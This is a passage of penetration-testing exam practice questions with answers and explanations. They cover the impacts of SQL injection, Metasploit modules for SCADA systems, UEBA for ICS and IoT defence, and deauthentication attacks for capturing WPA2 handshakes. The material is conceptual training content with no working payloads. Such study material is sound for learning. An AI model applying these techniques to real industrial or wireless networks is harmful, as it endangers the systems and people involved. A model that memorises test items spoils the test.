D. Unauthorized access to an application. With a successful attack using SQL injection, an attacker can gain: Compromised data integrity. As SQL statements are also used to modify or add the record, an attacker can use SQL injection to modify or add data stored in a database. This would lead to compromised data integrity. Unauthorized access to an application. An attacker can successfully bypass an application's authentication mechanism to have illegitimate access to it. Information disclosure. An attack could lead to a complete data leakage from the database server. Loss of data availability. An attacker can delete records from the database server.

During your reconnaissance, you have determined that your client has devices used to send remote control signals to industrial assets used by their critical infrastructure utilities connected to their corporate network. Which of the following methods would MOST likely be the best method for exploiting these systems? A. Use social engineering to trick a user into opening a malicious APK B. Use a spear phishing campaign to trick a user into installing a RAT C. Identify a jailbroken device for easy exploitation D. Use Metasploit modules designed to target the SCADA systems

D. Use Metasploit modules designed to target the SCADA systems A penetration tester can exploit supervisory control and data acquisition (SCADA) systems if they are within the engagement's scope. While Metasploit was initially designed for engagements against workstations and servers, Metasploit has several modules in the exploit/ windows/scada category that target vendor-specific SCADA components running Windows. Many of these trigger a buffer overflow, though, so be careful when using them and ensure you have permission to exploit these devices in your written authorization.

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? A. Installation of anti-virus tools B. Use of a host-based IDS or IPS C. Implement endpoint protection platforms D. User and entity behavior analytics

D. User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

Which of the following vulnerabilities is the greatest threat to data confidentiality? A. HTTP TRACE/TRACK methods enabled B. SSL Server with SSLv3 enabled vulnerability C. phpinfo information disclosure vulnerability D. Web application SQL injection vulnerability

D. Web application SQL injection vulnerability Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. Wrong Answers The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system's data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn't disclose any information about the data stored within the system, though, so it isn't a great threat to our data's confidentiality.

You are conducting a wireless penetration test against an organization. You have been monitoring the WPA2 encrypted network for almost an hour but have been unable to successfully capture a handshake. Which of the following exploits should you use to increase your chances of capturing a handshake? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

Deauthentication attacks are used in the service of an evil twin, replay, cracking, denial of service, and other attacks. All 802.11 Wi-Fi protocols include a management frame that a client can use to announce that it wishes to terminate a connection with an access point. The victim's device will be kicked off the access point by spoofing the victim's MAC address and sending the deauthentication frame to the access point. If the user is still using the network, the wireless adapter will automatically reconnect by sending a handshake to the access point. This allows the attacker to capture the handshake during the reconnection.